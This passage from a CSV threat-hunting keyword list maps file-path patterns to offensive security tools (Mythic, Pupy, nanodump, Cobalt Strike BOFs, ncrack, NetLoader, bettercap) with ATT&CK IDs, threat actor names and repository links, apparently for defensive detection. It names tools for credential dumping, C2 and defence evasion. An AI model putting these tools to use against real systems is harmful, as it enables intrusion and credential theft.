T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,1,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -*/Mythic/mythic*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/Mythic_CLI*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/MythicAgents/*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/MythicAgents/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/MythicC2Profiles/*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/mythic-cli*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/MythicConfig.cs*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/mythic-react-docker*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/mzet-/les-res*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/n1nj4sec/pupy*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/nanodump*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*/nanodump.*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/nanorobeus.git*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*/nanorubeus/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Native/SigFlip/*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/nat-pmp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nat-pmp-mapport.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nbd-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nbns-interfaces.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nbstat.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/NBTNS.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*/nccgroup/nccfsas/*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/ncp-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ncp-serverinfo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ncrack-*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,0,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*/ncrack.git*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,1,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*/ndmp-fs-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ndmp-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ndp_spoof*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/Needle_Sift_BOF/*,offensive_tool_keyword,cobaltstrike,Strstr with user-supplied needle and filename as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Needle_Sift_BOF,1,1,N/A,10,10,30,7,2021-09-27T22:57:33Z,2021-09-27T20:13:10Z -*/nessus.py*,offensive_tool_keyword,crackmapexec,parser nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/nessus.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/nessus-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nessus-xmlrpc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/net_recon/*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/net_sniff.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/net_sniff_*.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/netbus-auth-bypass.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/netbus-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/netbus-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/netbus-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/netcreds.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/NetExec.git*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,1,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*/NetExec-main*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,1,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*/Net-GPPPassword.git*,offensive_tool_keyword,Net-GPPPassword,.NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.,T1059.001 - T1552.007,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/outflanknl/Net-GPPPassword,1,1,N/A,10,2,156,37,2019-12-18T10:14:32Z,2019-10-14T12:35:46Z -*/nethunter-images/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/NetLoader.git*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,1,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*/netntlm.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/NetNTLMtoSilverTicket*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,1,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*/netscan.exe*,greyware_tool_keyword,netscan,SoftPerfect Network Scanner abused by threat actor,T1040 - T1046 - T1018,TA0007 - TA0010 - TA0001,N/A,N/A,Network Exploitation tools,https://www.softperfect.com/products/networkscanner/,1,1,N/A,6,10,N/A,N/A,N/A,N/A -*/netscan.exe*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*/netscan_linux.tar.gz*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*/netscan_portable.zip*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*/netscan_setup.exe*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*/netshrun.c*,greyware_tool_keyword,NetshRun,Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want,T1546.008 - T1112 - T1037 - T1055 - T1218.001,TA0003 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/gtworek/PSBits/blob/master/NetShRun,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*/netsparker.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/netstat_windows.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/nettitude/*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/nettitude/RunOF/*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 